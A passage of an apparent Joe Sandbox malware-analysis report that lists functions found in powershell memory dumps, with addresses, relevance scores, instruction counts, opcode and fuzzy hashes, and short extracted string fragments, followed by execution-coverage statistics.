                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 161167d58262a4b07f6a36583c59a378ac36b353523cdbe88290784d787a119d
                                                                        • Instruction ID: 6ed5f16292cd8f01fc01481c17dc8b803f0eb3c83a44708a055d727e0c094d34
                                                                        • Opcode Fuzzy Hash: 161167d58262a4b07f6a36583c59a378ac36b353523cdbe88290784d787a119d
                                                                        • Instruction Fuzzy Hash: 8F51E874A04219AFDB05CF98D884A9DFBF2FF88314F258598E404AB365D771AD82DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD7918 Relevance: .1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfc2255326300d0544685bc1b0d1b92d4cdcb2bf915dbe3709a2b7c6a5911dd9
                                                                        • Instruction ID: a06359e7187677db452dad87b91587e83d6c10db0d7e48b18f18e421b67cff6a
                                                                        • Opcode Fuzzy Hash: cfc2255326300d0544685bc1b0d1b92d4cdcb2bf915dbe3709a2b7c6a5911dd9
                                                                        • Instruction Fuzzy Hash: EB415F357006159FDB14EF24D558AAEBBF2EF88710F1484A9E406EB3A4DF34AC41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD2BB0 Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 919f0d4037984f57f966d6e58182b1b2ba01988d4ac497edd77391cb35f65504
                                                                        • Instruction ID: 20c99a25fc86b117910a95f035cf1c96098602dbf38bbe5a89ec0da524ed8a57
                                                                        • Opcode Fuzzy Hash: 919f0d4037984f57f966d6e58182b1b2ba01988d4ac497edd77391cb35f65504
                                                                        • Instruction Fuzzy Hash: D2416C74A005498FCB09CF58C5949AAFBB1FF88310B1585E9D816AB365D736FC50CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A45088 Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cc9028d118f9bb36cb001b9e5b94558381de0be6c290a40fc7a8635e4e57338e
                                                                        • Instruction ID: fe5cf5977e673f95f5d3b53e9267d927b5fa688c28326ddaf52d1752fa477c4f
                                                                        • Opcode Fuzzy Hash: cc9028d118f9bb36cb001b9e5b94558381de0be6c290a40fc7a8635e4e57338e
                                                                        • Instruction Fuzzy Hash: 63319FB4B00214ABD714A7A8C851FAF7AA3EBC4744F54C424EA05AF781CF76AC45CBD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A414C0 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25989e77a9b88fc478e5e553b6650e53cc80bd85a56968965c2f77a3cc2c884c
                                                                        • Instruction ID: aa12c07371a712fe27ee8603dc913f7a83301e9132a0cf5a67b05dfb96c1f73e
                                                                        • Opcode Fuzzy Hash: 25989e77a9b88fc478e5e553b6650e53cc80bd85a56968965c2f77a3cc2c884c
                                                                        • Instruction Fuzzy Hash: 542137F171031A9BDB205AADC801B77AAD69BC4715F60C42AD557CB284ED77D88183A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A40A61 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6533f73d30ec9b4c036eae7cfcbc271c1d4f4a03a17c8d05e228553a8524bcf6
                                                                        • Instruction ID: 2b99f11643d6db61c098a25ab44f8325045920bba50484eba4ef519214f055c1
                                                                        • Opcode Fuzzy Hash: 6533f73d30ec9b4c036eae7cfcbc271c1d4f4a03a17c8d05e228553a8524bcf6
                                                                        • Instruction Fuzzy Hash: BD2106F27002259BCB14976894107ABFBA3ABC5229B2484FAC725DB341DB73C946D3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDAED5 Relevance: .1, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9724537bd1541d911f675e6bed37a31f161b1bf3119a827b76f00792e4418942
                                                                        • Instruction ID: 0f06c73da195e0eab0ea78147b2b16672fbac10bd10d5bfec8d6136cddf4ed23
                                                                        • Opcode Fuzzy Hash: 9724537bd1541d911f675e6bed37a31f161b1bf3119a827b76f00792e4418942
                                                                        • Instruction Fuzzy Hash: CE316A75A042059FCB15CF49C8809AEFBB1FF49320B2586D9E809EB755D331EC81CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A414A6 Relevance: .1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09a1e412e1a1219994985439cb01cf6b988c273bf2d1554039aef8f958d33344
                                                                        • Instruction ID: 03d12a347fc40c94de22a94ccc081f68278fc391d97320f824f7f85905ba7b90
                                                                        • Opcode Fuzzy Hash: 09a1e412e1a1219994985439cb01cf6b988c273bf2d1554039aef8f958d33344
                                                                        • Instruction Fuzzy Hash: 4A219EF130434A6BCB200BA9C800B76BFD54FC5710F648466D9568B2C1E93AD9C4C3A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A40BC2 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d15c936ef397adf17b97b932e8e5a4212231d762ab3928a83f366a7075ca9af3
                                                                        • Instruction ID: 2dcad9365a2814721d5ebd4cfc80de750d688885eaa0e33d15d018ecb81b29ae
                                                                        • Opcode Fuzzy Hash: d15c936ef397adf17b97b932e8e5a4212231d762ab3928a83f366a7075ca9af3
                                                                        • Instruction Fuzzy Hash: C511E2B2300201EBCB358E088440B7BBB57ABC0751F58C1A5EA288F291CB33EC45E7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4E956 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e8e73b93719fa7751554f76bd97fecb236a912f8d77f825780489eb9414cbb2
                                                                        • Instruction ID: cdace5c2127af72b41fff6ecdd3a763e944e7e9e221c1ae397e6778a55e003c1
                                                                        • Opcode Fuzzy Hash: 1e8e73b93719fa7751554f76bd97fecb236a912f8d77f825780489eb9414cbb2
                                                                        • Instruction Fuzzy Hash: C01136F2B08212CBCB108B188850BA9B7A3BBC0355F05C4B5D5119F3A5CB33DC45C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A412B0 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b95d4f1d5555869788f8d67b05d3ce714526c8f7b824a53b4c47e141580bb22
                                                                        • Instruction ID: 437d8fa9e0369459b92c92c7c8c767671698029dc599c805bfa593ad944f8fa0
                                                                        • Opcode Fuzzy Hash: 3b95d4f1d5555869788f8d67b05d3ce714526c8f7b824a53b4c47e141580bb22
                                                                        • Instruction Fuzzy Hash: 4401F77630031ACBDB2457AAD40057BB7D9DFD5263F24C43AD565C7640DA33C886C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0327D01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2056948360.000000000327D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0327D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_327d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4547949304d49068e2c2c8e9b963e2acf32a71654edd6392960b07a9a354182
                                                                        • Instruction ID: ce05cc814fb6f69808f9dd76cf67d04e6489e078fa1e060e6e911e587f25ccff
                                                                        • Opcode Fuzzy Hash: e4547949304d49068e2c2c8e9b963e2acf32a71654edd6392960b07a9a354182
                                                                        • Instruction Fuzzy Hash: E201A2714193449AE720CA29CC84B66FFD8EF51325F1CD45AED590B282C6799885C7B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A49559 Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bf9c03e6a697d5a8c25b4a9dc7cf1f60e2a85e9c81672d634e90ef7793d215b
                                                                        • Instruction ID: e9ab813c5c38349a30e8bc597caae632d36a658b653b83f931492d3fac5bb7d2
                                                                        • Opcode Fuzzy Hash: 6bf9c03e6a697d5a8c25b4a9dc7cf1f60e2a85e9c81672d634e90ef7793d215b
                                                                        • Instruction Fuzzy Hash: 090180B4640215DFD7209B90C994FAB77B2BBC4305F5088A4EA096F380CB77AD89CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0327D01C Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2056948360.000000000327D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0327D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_327d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30001171cf16a640c1f0d959344cc69ffe3c4ca73cd31401078f516cd83e7176
                                                                        • Instruction ID: d0e3af7e5bcbd68593567deaf2999f88136afff0b708c3134c747ae8247dbc18
                                                                        • Opcode Fuzzy Hash: 30001171cf16a640c1f0d959344cc69ffe3c4ca73cd31401078f516cd83e7176
                                                                        • Instruction Fuzzy Hash: 61F06272445344AEE7108A15CD84B62FF9CEF51735F18C59AED484B286C2799885CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0327D508 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2056948360.000000000327D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0327D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_327d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11f3dc83207418445dc86a7413546ba5685936a3060e4ed57463d43c254edb43
                                                                        • Instruction ID: 25f3cca6fafb34a76709f49f06da934781e1c2748f9660978a6ae737d087a57c
                                                                        • Opcode Fuzzy Hash: 11f3dc83207418445dc86a7413546ba5685936a3060e4ed57463d43c254edb43
                                                                        • Instruction Fuzzy Hash: 122107B2514341DFDB05DF14D9C4B26BF65FF88358F28C5A9E90A0B246C336D496CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4A975 Relevance: 14.0, Strings: 11, Instructions: 286COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$tPqq$tPqq$tPqq$tPqq$$qq$(wq$(wq$(wq$(wq
                                                                        • API String ID: 0-2135969470
                                                                        • Opcode ID: e031141e214fe3f23a2e70014d6397daab853bb2168f83413a8d616d9671b9a9
                                                                        • Instruction ID: ffdca9a8f831074d74b02ceb542c207b6b2e30be7566fcfad2683116c97c79b9
                                                                        • Opcode Fuzzy Hash: e031141e214fe3f23a2e70014d6397daab853bb2168f83413a8d616d9671b9a9
                                                                        • Instruction Fuzzy Hash: E9A1F6B174421ADFCB249F68C90066ABBF2BFC9311F14C469E9159B381CB36DC41C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A473B8 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $qq$$qq$$qq$$qq$$qq$$qq
                                                                        • API String ID: 0-1822695862
                                                                        • Opcode ID: 1463648aea3eeeb390780a127d92738eaac22bbeaa891f67bcf1297fc23577ef
                                                                        • Instruction ID: 9ace788cd492f381f1c434b7760ede5e2c18b91ed6b9c77ca73e10819c3b66c5
                                                                        • Opcode Fuzzy Hash: 1463648aea3eeeb390780a127d92738eaac22bbeaa891f67bcf1297fc23577ef
                                                                        • Instruction Fuzzy Hash: D83139B2714397CBDB394A658850176FBB1ABC2211F24847BC8668B245CF37C845D752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A49820 Relevance: 6.4, Strings: 5, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$_$$qq$$qq$$qq
                                                                        • API String ID: 0-3457687916
                                                                        • Opcode ID: d89d8f59001aa88e092f5e9c65d2eac859b09908eb9db557e89fc69648391993
                                                                        • Instruction ID: 1608440faea62de9b155a61f8e04b68c2efb3d0626cc3003b0d93e87657683a3
                                                                        • Opcode Fuzzy Hash: d89d8f59001aa88e092f5e9c65d2eac859b09908eb9db557e89fc69648391993
                                                                        • Instruction Fuzzy Hash: CB5107F160835A9FDB148F29C8003A7BBF5AFC2212F18C07AE4688B252C737E865C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A40548 Relevance: 6.4, Strings: 5, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$$qq$$qq$$qq
                                                                        • API String ID: 0-1584382674
                                                                        • Opcode ID: 5521ec33dc2947a3b3d7a2aa8c777e10a7624f9dc2b7a9e36473d8d1ee871d9b
                                                                        • Instruction ID: acf3297dab6d78b2ba2b33b8efb00aecfab8ed2c580a41cad6e02a422a89c0be
                                                                        • Opcode Fuzzy Hash: 5521ec33dc2947a3b3d7a2aa8c777e10a7624f9dc2b7a9e36473d8d1ee871d9b
                                                                        • Instruction Fuzzy Hash: 224146B1704356EFCB155B2488106BFBFB29FC2201F1084AADA16CB281DB73C941E7A3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4A438 Relevance: 6.4, Strings: 5, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$$qq$$qq$$qq
                                                                        • API String ID: 0-1584382674
                                                                        • Opcode ID: 264e7325264f09c9e4227354c945076d4059cac8c1e45333acb2c9a52764a85d
                                                                        • Instruction ID: 87236bef9a97a9f267439d9a78c49730cc4f656f283106c7045332d2c30d1461
                                                                        • Opcode Fuzzy Hash: 264e7325264f09c9e4227354c945076d4059cac8c1e45333acb2c9a52764a85d
                                                                        • Instruction Fuzzy Hash: 6A4128B2B48356CFCB218B69990466EBBF5AFC5211F24C0BBD825CB241DF36C841C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A49890 Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$$qq$$qq$$qq
                                                                        • API String ID: 0-1584382674
                                                                        • Opcode ID: f27b4ec004119ba20b51e735e1c3d3ce9ab63ea502f73b9fbe618f42773ecffa
                                                                        • Instruction ID: ce61830cc1e6c072aa3db60b8b0c550664419b94fabe8dc2f08707f9d7e50db1
                                                                        • Opcode Fuzzy Hash: f27b4ec004119ba20b51e735e1c3d3ce9ab63ea502f73b9fbe618f42773ecffa
                                                                        • Instruction Fuzzy Hash: F63108B171820EDFDF258F24C8402AB77A5AFC6362F24C425E8694B266CB33E951C750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4C807 Relevance: 6.3, Strings: 5, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPqq$$qq$$qq$$qq$$qq
                                                                        • API String ID: 0-3720336148
                                                                        • Opcode ID: ca9fb04cf297ca6e94ef58481b9fd8c05549c05e63e7c6c39f0dfcce056e1a7e
                                                                        • Instruction ID: 96a822598a13e931e204c0c6ef311603dfbaa2d991d196c028367e7bc413e519
                                                                        • Opcode Fuzzy Hash: ca9fb04cf297ca6e94ef58481b9fd8c05549c05e63e7c6c39f0dfcce056e1a7e
                                                                        • Instruction Fuzzy Hash: DF2107B5606312DFCB248F64C940976BBB4EFC1621B1540A7E968DB362D736DD04C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A49AD8 Relevance: 5.5, Strings: 4, Instructions: 490COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oqq$(oqq$(oqq$(oqq
                                                                        • API String ID: 0-3701351494
                                                                        • Opcode ID: 663dedcadd37e440530685f0a20ef545555c0df97e2c6f5173759e6901c30c29
                                                                        • Instruction ID: 3973b57b4c8f77d5a553c79977ef1719e7fca2c8fb08bd3a8e0deb13c81e8ad4
                                                                        • Opcode Fuzzy Hash: 663dedcadd37e440530685f0a20ef545555c0df97e2c6f5173759e6901c30c29
                                                                        • Instruction Fuzzy Hash: DCF128B1708306CFCF259F68C8447ABBBB2AFC5311F14846AE5258B291CB37E861CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4EAF8 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$4'qq$4'qq
                                                                        • API String ID: 0-4257899170
                                                                        • Opcode ID: 524d92f6543278b560c633b771a752cf4e3d5cbcbc5e0e5b7f89db7aa4cc21cc
                                                                        • Instruction ID: 0d114fe81184fde03b7c2ac5d858ecfc792183dc7cb6d80f7b6f1bccdaf3fe9e
                                                                        • Opcode Fuzzy Hash: 524d92f6543278b560c633b771a752cf4e3d5cbcbc5e0e5b7f89db7aa4cc21cc
                                                                        • Instruction Fuzzy Hash: 7EE137B17083168FDB258B68880176BBBB2BFC6311F18C4BAD529CB295DB33D845C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4CDF0 Relevance: 5.4, Strings: 4, Instructions: 392COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPqq$tPqq$tPqq$tPqq
                                                                        • API String ID: 0-2887196909
                                                                        • Opcode ID: dbf596f7c63f573f1355239edf5f601fc4b70bc13d8113f27cb44776ac46e7ba
                                                                        • Instruction ID: af860aac1bf456792ba076c195c149f94ca962b7adf198bf8846dc60a6ab0cdf
                                                                        • Opcode Fuzzy Hash: dbf596f7c63f573f1355239edf5f601fc4b70bc13d8113f27cb44776ac46e7ba
                                                                        • Instruction Fuzzy Hash: 5BD117B1B04215DFCB148B68C855A6ABBF2BFC9320F14C46AD9299B391CB32DC45C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A47D5E Relevance: 5.4, Strings: 4, Instructions: 355COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$4'qq$4'qq
                                                                        • API String ID: 0-4257899170
                                                                        • Opcode ID: 2b3de66aaa12d1f0bf6f9c06dbc73d0b7fbc9d9b4eaa76c0e4c8759a64a7e2bd
                                                                        • Instruction ID: dd9b053dba03ba049a035f6435650b8ac050ace56953973079bbd1fe01827835
                                                                        • Opcode Fuzzy Hash: 2b3de66aaa12d1f0bf6f9c06dbc73d0b7fbc9d9b4eaa76c0e4c8759a64a7e2bd
                                                                        • Instruction Fuzzy Hash: B2F16EB4A00228DFCB14DB54C844BAEBBB2BBC8305F5084A5D6096F385CB76AD85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4FC38 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $qq$$qq$$qq$$qq
                                                                        • API String ID: 0-3704488771
                                                                        • Opcode ID: 2289b0f5c4f774b9673b558602eeb71d01493c5e367b1f386b51294945e5ffab
                                                                        • Instruction ID: c9205636e0501149189b141b0c3aeae8a0968fd9841effb622c0d4a0a4843237
                                                                        • Opcode Fuzzy Hash: 2289b0f5c4f774b9673b558602eeb71d01493c5e367b1f386b51294945e5ffab
                                                                        • Instruction Fuzzy Hash: 4B2147B13003129FDF34562A8800727AAE69BC4715F38983ADD59CB385DE37D8418361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A403E2 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$$qq$$qq
                                                                        • API String ID: 0-2004584679
                                                                        • Opcode ID: bd66d63934f8338d351fa83760f9a0c38696c1850dc1641726e4bca825ee0eef
                                                                        • Instruction ID: c52f373f7539b723c78d77bf521491f28f1a58ad0979bcf7602851ffdbb5e6b0
                                                                        • Opcode Fuzzy Hash: bd66d63934f8338d351fa83760f9a0c38696c1850dc1641726e4bca825ee0eef
                                                                        • Instruction Fuzzy Hash: 4301F7B071D3979BC726422808202A6ABB29FC3551F3900EBC655DB287CE268C4A9393
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:2.3%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:7.8%
                                                                        Total number of Nodes:411
                                                                        Total number of Limit Nodes:62
